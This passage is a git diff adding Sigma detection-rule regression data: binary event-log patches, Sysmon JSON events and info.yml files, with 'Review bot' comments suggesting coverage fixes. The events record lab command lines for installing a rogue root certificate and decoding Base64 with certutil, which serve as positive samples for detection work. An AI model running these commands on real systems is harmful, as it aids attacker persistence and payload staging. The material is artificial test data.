z6fHq=28mR6eluuY<|Vym^CSdV)fl)V^|S-Ej8vd=;a>4m-p$ZGXT8yO?Zt{`5f(5-SwSE3ospQp1aXOewl9rfGic|b5dt>54H7|ItrsQ(dk8D$+|jB# z?S@1$*KPZghDR6bT+*G$V?55nHKwh{($R+EvI075U=)_4Wwh&ddTjNP zgFpFW>Bp178%xhz`R(=UA9A~rD9Ad@S#k|a`{#}|#^MJG?>lCXoc8W}`e#=k`p%7i zKsYId2>%MVd?xcKKgslqOMBUwok2gV<~Xi=Ml%b)w30+6N*1IS}dG+_L}X zZ8B$mHeqSX?~mje{mApi z3!m`OGzX?EJASrp7g^RYZcXmAi;zu+vZK*D$tPN87xIQ)oWWU#e9hwZw4&C&%SytT zNQ#*~>8y|#HWZ0%J7dZ1X;xUiHI$*ld#;KFn*Mf#+Kf5#jJq}RH@Uv${cL9_wQaN~ zVe5?BS*`3qk)==DW?xJG7}nuubK!$3&h(G8Jm^M_a-Z>KB_zf=#nKz@x==qKX4X)& z0?rw&AcxH2y653vT-jPrWR<6kd3?VAw6Kg+0RzIP2Q0XrFNX`)mTE;nRf~dg@JWzEd(Q79e#2 z{>;1givf5#hSmUl>x2K>Tid>O3YMOL)fzrCSabOHwCen6J&CrT_x5*n)$i2oMesa< zXqNCod>q#Y@H3&ZYkZj>&pdo(@zt*#XM$LKwj^Mi= z`kY}5y_7G&BIh5)IAsfvs5nn}WpBaFID*yy literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json new file mode 100644 index 000000000..c9efaed51 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:39:33.565515Z" + } + }, + "EventRecordID": 33232425, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:39:33.564", + "ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002", + "ProcessId": 10712, + "Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "FileVersion": "128.14.0", + "Description": "Tor Browser", + "Product": "Tor Browser", + "Company": "Mozilla Corporation", + "OriginalFileName": "firefox.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D", + "ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002", + "ParentProcessId": 1292, + "ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor 
Browser\\Browser\\firefox.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml new file mode 100644 index 000000000..267915f73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml @@ -0,0 +1,12 @@ +id: 8e750cec-bc57-4b20-bd0a-006733558c56 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c + title: Tor Client/Browser Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx 
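Review bot: this positive test exercises only the browser side of "Tor Client/Browser Execution": the JSON records `firefox.exe` with `Description` and `Product` set to `Tor Browser` (spawned by the same `firefox.exe` launcher, `ParentProcessId` 1292), which is exactly the PE-metadata marker path the commit message says was added, while no sample for the standalone Tor client binary is included; consider adding a second `regression_tests_info` entry for the client case, or replace `description: N/A` with a sentence that the test covers the browser metadata markers only, so the gap is visible to whoever next touches the rule.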
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx new file mode 100644 index 0000000000000000000000000000000000000000..4526bfaff5811cd1e030c55adf20474f0e8cad66 GIT binary patch literal 69632 zcmeI0U2Ggz701tvch~E+ch^p92s9~9`AX8-@!DQ{oirrtU2hWN6cf@GB1@6+N9@Ml zwPGhUM5-cCLG+;oBwpa9luCSw2!W7Lg;WU%5JBeq`vUbmljok(#ZV(cV@Eo z#�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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json new file mode 100644 index 000000000..b55c1820b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:54:23.873276Z" + } + }, + "EventRecordID": 11383720, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:54:23.866", + "ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002", + "ProcessId": 8592, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + 
} + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml new file mode 100644 index 000000000..ed41b8f49 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml @@ -0,0 +1,13 @@ +id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 + title: New Root Certificate Installed Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx 
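Review bot: `description: N/A` leaves this sample undocumented, and the one thing a maintainer needs when the test breaks is what the evtx actually contains; record the captured invocation here (per the JSON sidecar: `certutil -addstore -f root C:\Users\ADMINI~1\AppData\Local\Temp\cert.cer`, launched from cmd.exe as ATTACKRANGE\Administrator at High integrity). Two smaller points on the same file: `date: 2025-10-24` predates the event's `SystemTime` of 2025-10-25T16:54:23Z in the sidecar, so either the field means something other than capture date and should be documented as such, or it should be corrected; and `path` references only the .evtx while the .json next to it appears nowhere in `regression_tests_info`, so state whether CI consumes the JSON (for example as a second `type`) or whether it is a human-readable mirror that can drift from the evtx unchecked.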
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx new file mode 100644 index 0000000000000000000000000000000000000000..5c755afbd5bcf7b3ce822246ead4ac7fa43cd6d4 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json new file mode 100644 index 000000000..46c374057 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:56:16.019794Z" + } + }, + "EventRecordID": 11418519, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:56:16.013", + "ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002", + "ProcessId": 5112, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -decode file.base64 file-decoded.ext", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
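Review bot: the only command line in this sample is `certutil -decode file.base64 file-decoded.ext`, but the rule it regresses is titled "File Decoded From Base64/Hex Via Certutil.EXE", so the hex branch has no coverage: an edit that drops or mistypes the hex-decode marker would still pass this test. Add a second event using the hex form (`certutil -decodehex <infile> <outfile>`) to the evtx and raise `match_count` accordingly, or note in info.yml that only the Base64 path is exercised.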
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml new file mode 100644 index 000000000..c1ab6ac35 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml @@ -0,0 +1,13 @@ +id: e582dfce-5cb3-4991-9719-9a336eb90a6f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 + title: File Decoded From Base64/Hex Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx 
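Review bot: `regression_tests_info` lists a positive test only, so this file catches a rule that stops firing but not one that starts over-matching, which is the regression most likely to creep in when CLI markers are loosened. Consider pairing the positive evtx with a benign certutil invocation that must not match (for example `certutil -hashfile <file> SHA256`) and asserting `match_count: 0`; the schema already expresses that without new fields.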
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..429f79e942947324b3175013536ff2485c4e74a0 GIT binary patch literal 69632 zcmeHQ3v650c|N2lijqt{96NEGN9m+VZO4*HNtCEKYD|%otXfJPTh0sGGFcB(i5`X| z$8l10UejdAy3O5yU_iG5X%{qI*Cqjsu0z(%L$e}4izaEhA<0?<1%j?y8f+6Mh`$s2dS0ubb0H*WE8&7DML5992D8$x~5dTvx#J>mZ1oq*64`7IL zKQFBi=V_$L&oxMspZBcr-?Q%X-k;;%WC1_7;`-MX_nQmSn6YRv?q6BwLkQakn$H)| zVVF`sKFHvFJ~!H=Y^Sh&JIb_4ESLZG`VY4KF!K{%qt7SS`OY1hZPBrLe(Tc9_dJ#8 zJNwpOuYc+pcoGZmbp$iWxDDhYNU6 z?Td>nf-Q<8;%2cE-vu#-I}->qit|?dPT|hHn8Veam_*1{T+iYDPH_y+X7Sr5qWE^; zEGiQCKe3$rg6+!hTUz=R%1W2p+;C7F5XV7zQKkq5PcALp4Zd`V{_^3F*e6qe0BMaQ z)I6Sc;^@=Lxc7;GxDCwC;Gqx=4Z;_^%hHE!8v~+W9F;Ngs8KXlC9A{`f<0t~cz3iW zPgnyYjb|Uj5v0nI%(j266SsrJC`2}e>`zG+D7uD#2>KhUL@?m17uVs2*7QxaHR28{ z*c2qis_Jj37l8ok+_kvSDn9;FwHQP|mesTjBpApquExdHmY!xF4v1k{7Wc~_ekSM> z5nQke@bk>ILGeixAd7_}VsbuGsumx`g|0dGy&MvI@%T8(Z4PoAhuj&oT5JqJ?E7%> zClPQezP&8Nh>Yy#Twxq8roG0!5 zAV`+UiITj(p-$A1mq!svHwa(;RlP{bVB}+3a-zjLf^dC(Rt>NFWt~WZ;vyKQwk#s2 zif%)VXbiGZV6n%)+bo#0qQpFTL<&<~mX>CahHgau_M5fHz=M+UqcR~?ynDz8N>h-R zy4PwgogG8K1$-?oLLwAo)5@ZKv^xX|XD!)k0W{Q#P?fJqsuLSyejb5}rVw%ziZmJnhi-o%|I2%oT@ASYTs3eJ1<(S>e_-FkD*vtqKo)HCho^m zQa_9+t&qzc?or=a61_-3H_=bFhEUinw4;cj1T4fy5F)5s>&d~OIEWlGZ7bL7#AQ{1 zhGwxPAkcN8oeRhVdW`N&-CAB3Niv8qv3_^D>nL*Uuol(mREac>q9nS*o|AS2Zr&ER@g+?zOZ z=l1XXGKk42fw!A zO%x|Xp@d(>Df?u8(x0LF>83p`$&TVaTg`6#vX7<~{=r-TEg2K#(<^ZV*;-a3x&0`+ zX%vrcG5ui_2@CoLEB+O^&^0K^MMz9nYJV6UF>H$!Ru;XYTwkE_y4m%I{i2a^wpnqm z%F%aLlX2k>SBVhAZ?VF&^eyhIp;GLYsHgrg)X0;UK1iFnv^T^4aCMP5X@qCzN6kL6 zTweZgu!wwA*E9~9vf1&6Yl?(r8^)^1nsyvvLn>^Sl~2mY%4ZYwhFl!RF^lliLgyz} zYPCgjqEe!ysM&*(3MGaLMTxnln38pxEi6Y3X~f|B{3i zgwzsNnxi|2oIKVmdBm-hWM`{tSR-nfSA3Pf%T)e6YG*EPel6NiBEMcbwNb@qSx_sk 
